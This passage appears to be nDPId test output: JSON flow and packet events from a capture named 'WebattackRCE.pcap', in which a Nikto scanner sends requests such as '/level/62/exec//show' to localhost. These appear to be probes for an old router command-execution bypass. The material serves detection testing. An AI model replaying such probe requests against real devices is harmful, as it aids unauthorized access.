{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/61\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001308)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":610,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277669,"flow_last_seen":1576420277669,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50782,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":610,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":610,"flow_packet_id":1,"flow_last_seen":1576420277669,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277669,"pkt":"AAAAAAAAAAAAAAAACABFAADI7qNAAEAGTYp\/AAABfwAAAcZeH5CzGNepEFgF6YAYAED+vAAAAQEICp1m\/s2dZv7NR0VUIC9sZXZlbC82Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMDkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":610,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277669,"flow_last_seen":1576420277669,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50782,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/62\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001309)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":611,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277670,"flow_last_seen":1576420277670,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277670,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50784,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":611,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":611,"flow_packet_id":1,"flow_last_seen":1576420277670,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277670,"pkt":"AAAAAAAAAAAAAAAACABFAADI1RxAAEAGZxF\/AAABfwAAAcZgH5DKr+wUPhtD5IAYAED+vAAAAQEICp1m\/s6dZv7OR0VUIC9sZXZlbC82My9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzEwKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":611,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277670,"flow_last_seen":1576420277670,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277670,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50784,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/63\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001310)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":612,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277675,"flow_last_seen":1576420277675,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50786,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":612,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":612,"flow_packet_id":1,"flow_last_seen":1576420277675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277675,"pkt":"AAAAAAAAAAAAAAAACABFAADI4N9AAEAGW05\/AAABfwAAAcZiH5DpddnYHCFGp4AYAED+vAAAAQEICp1m\/tOdZv7SR0VUIC9sZXZlbC82NC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMTEpDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":612,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277675,"flow_last_seen":1576420277675,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50786,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/64\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001311)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":613,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277677,"flow_last_seen":1576420277677,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50788,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":613,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":613,"flow_packet_id":1,"flow_last_seen":1576420277677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277677,"pkt":"AAAAAAAAAAAAAAAACABFAADIG8lAAEAGIGV\/AAABfwAAAcZkH5CYBSLNt2luhoAYAED+vAAAAQEICp1m\/tWdZv7VR0VUIC9sZXZlbC82NS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzEyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":613,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277677,"flow_last_seen":1576420277677,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50788,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/65\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001312)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":614,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277678,"flow_last_seen":1576420277678,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50790,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":614,"flow_packet_id":1,"flow_last_seen":1576420277678,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277678,"pkt":"AAAAAAAAAAAAAAAACABFAADIttNAAEAGhVp\/AAABfwAAAcZmH5DUdY\/bkd0KuYAYAED+vAAAAQEICp1m\/tadZv7WR0VUIC9sZXZlbC82Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzEzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":614,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277678,"flow_last_seen":1576420277678,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50790,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/66\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001313)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":615,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277680,"flow_last_seen":1576420277680,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50792,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":615,"flow_packet_id":1,"flow_last_seen":1576420277680,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277680,"pkt":"AAAAAAAAAAAAAAAACABFAADI\/OVAAEAGP0h\/AAABfwAAAcZoH5ACKMXwYFGAmIAYAED+vAAAAQEICp1m\/tidZv7YR0VUIC9sZXZlbC82Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzE0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":615,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277680,"flow_last_seen":1576420277680,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50792,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/67\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001314)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":616,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277681,"flow_last_seen":1576420277681,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50794,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":616,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":616,"flow_packet_id":1,"flow_last_seen":1576420277681,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277681,"pkt":"AAAAAAAAAAAAAAAACABFAADIw2NAAEAGeMp\/AAABfwAAAcZqH5BLUvpuf7sPloAYAED+vAAAAQEICp1m\/tmdZv7ZR0VUIC9sZXZlbC82OC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMTUpDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":616,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277681,"flow_last_seen":1576420277681,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50794,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/68\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001315)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":617,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277683,"flow_last_seen":1576420277683,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50796,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":617,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":617,"flow_packet_id":1,"flow_last_seen":1576420277683,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277683,"pkt":"AAAAAAAAAAAAAAAACABFAADIBQVAAEAGNyl\/AAABfwAAAcZsH5CyYjwQgGi0OYAYAED+vAAAAQEICp1m\/tudZv7bR0VUIC9sZXZlbC82OS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzE2KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":617,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277683,"flow_last_seen":1576420277683,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50796,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/69\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001316)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":618,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277685,"flow_last_seen":1576420277685,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50798,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":618,"flow_packet_id":1,"flow_last_seen":1576420277685,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277685,"pkt":"AAAAAAAAAAAAAAAACABFAADI1dZAAEAGZld\/AAABfwAAAcZuH5B\/K+zaVaEXFIAYAED+vAAAAQEICp1m\/tydZv7cR0VUIC9sZXZlbC83MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMTcpDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":618,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277685,"flow_last_seen":1576420277685,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50798,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/70\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001317)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":619,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277687,"flow_last_seen":1576420277687,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50800,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":619,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":619,"flow_packet_id":1,"flow_last_seen":1576420277687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277687,"pkt":"AAAAAAAAAAAAAAAACABFAADIUq1AAEAG6YB\/AAABfwAAAcZwH5AONGunkxG0mYAYAED+vAAAAQEICp1m\/t+dZv7fR0VUIC9sZXZlbC83MS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzE4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":619,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277687,"flow_last_seen":1576420277687,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50800,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/71\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001318)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":620,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277689,"flow_last_seen":1576420277689,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50802,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":620,"flow_packet_id":1,"flow_last_seen":1576420277689,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277689,"pkt":"AAAAAAAAAAAAAAAACABFAADIo8lAAEAGmGR\/AAABfwAAAcZyH5BwuZrK24oufIAYAED+vAAAAQEICp1m\/uGdZv7hR0VUIC9sZXZlbC83Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 